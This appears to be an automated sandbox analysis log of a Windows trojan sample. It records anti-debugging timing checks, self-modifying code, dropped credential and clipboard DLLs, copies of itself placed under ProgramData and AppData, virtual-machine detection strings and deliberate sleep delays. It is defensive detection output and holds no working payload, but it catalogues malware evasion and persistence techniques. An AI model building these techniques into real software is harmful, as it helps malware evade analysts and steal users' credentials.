Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000945 second address: 500094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500073A second address: 500073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500073E second address: 5000744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000744 second address: 50007AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F362081F59Fh 0x0000000c sub si, 9F7Eh 0x00000011 jmp 00007F362081F5A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F362081F59Eh 0x00000020 push eax 0x00000021 jmp 00007F362081F59Bh 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F362081F5A5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50007AF second address: 50007D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3620DC90FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50007D5 second address: 5000843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F362081F5A7h 0x00000009 adc esi, 544F14FEh 0x0000000f jmp 00007F362081F5A9h 0x00000014 popfd 0x00000015 movzx ecx, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F362081F5A4h 0x00000025 adc si, 5B28h 0x0000002a jmp 00007F362081F59Bh 0x0000002f popfd 0x00000030 push esi 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000843 second address: 5000848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0277 second address: 4FA027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA027B second address: 4FA027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA027F second address: 4FA0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0285 second address: 4FA029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9102h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA029B second address: 4FA029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA029F second address: 4FA02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, dl 0x0000000c pushfd 0x0000000d jmp 00007F3620DC9106h 0x00000012 or ch, 00000048h 0x00000015 jmp 00007F3620DC90FBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 call 00007F3620DC9101h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA02EC second address: 4FA0305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0305 second address: 4FA0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0309 second address: 4FA030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C2F second address: 5000C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9108h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C4B second address: 5000C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C59 second address: 5000C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Special instruction interceptor: First address: B6C005 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Special instruction interceptor: First address: D49E4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 4EC005 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 6C9E4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 24CB65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 3EBEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 3F471F instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: AECB65 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C8BEAE instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C9471F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 50B99A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 50BA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 6AF951 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 73764A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 1CB99A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 1CBA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 36F951 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 3F764A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: F7CB65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 111BEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 112471F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_05000D4A rdtsc 0_2_05000D4A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5205
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6976 Thread sleep count: 48 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6976 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2492 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2492 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep count: 304 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep time: -9120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2120 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2120 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6700 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2944 Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2944 Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3180 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3180 Thread sleep time: -53000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4336 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 7124 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 5236 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 168 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 7128 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 89 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep time: -46023s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3688 Thread sleep time: -42021s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 36 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 145 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 92 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4884 Thread sleep time: -36018s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3408 Thread sleep time: -30015s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 34 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1312 Thread sleep time: -42021s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3152 Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3512 Thread sleep time: -36018s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 143 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3444 Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 89 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3320 Thread sleep time: -38019s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 772 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 95 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 102 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 5948 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6904 Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4496 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2764 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
Source: explorha.exe, explorha.exe, 00000002.00000002.1747528068.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.2895332014.000000000067F000.00000040.00000001.01000000.00000008.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2892406718.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, amert.exe, 00000018.00000002.2571780914.000000000068F000.00000040.00000001.01000000.00000011.sdmp, explorgu.exe, 00000019.00000002.2602792989.000000000034F000.00000040.00000001.01000000.00000012.sdmp, RageMP131.exe, 0000001A.00000002.2892518126.00000000010FF000.00000040.00000001.01000000.00000013.sdmp, ad0e9cf6d6.exe, 0000001B.00000002.2892342399.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ad0e9cf6d6.exe, 0000001B.00000003.2690881000.0000000000D15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000121B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&l
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWIC;
Source: explorha.exe, 00000006.00000002.2904871906.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E1743E1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2450226998.000002E174328000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.2892509768.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2899511665.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001568000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2899823054.0000000001537000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001401000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.0000000001419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: MPGPH131.exe, 00000014.00000003.2462757282.0000000001225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}8
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: RageMP131.exe, 0000001C.00000003.2773831202.0000000000A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 00000013.00000002.2899823054.0000000001547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}m
Source: MPGPH131.exe, 00000013.00000002.2899823054.00000000014DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&[
Source: netsh.exe, 00000009.00000002.2367337414.00000178B7287000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2366894852.00000178B7284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RageMP131.exe, 0000001A.00000002.2900005103.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd
Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000A10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 00000013.00000003.2460839915.0000000001545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXx
Source: ad0e9cf6d6.exe, 00000016.00000003.2526875239.00000000013E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-
Source: MPGPH131.exe, 00000013.00000003.2460839915.000000000154D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorha.exe, 00000006.00000002.2904871906.0000000000A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW 5
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHV%
Source: ad0e9cf6d6.exe, 0000001B.00000002.2899906301.0000000000D13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Z
Source: MPGPH131.exe, 00000014.00000002.2899702692.000000000124D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
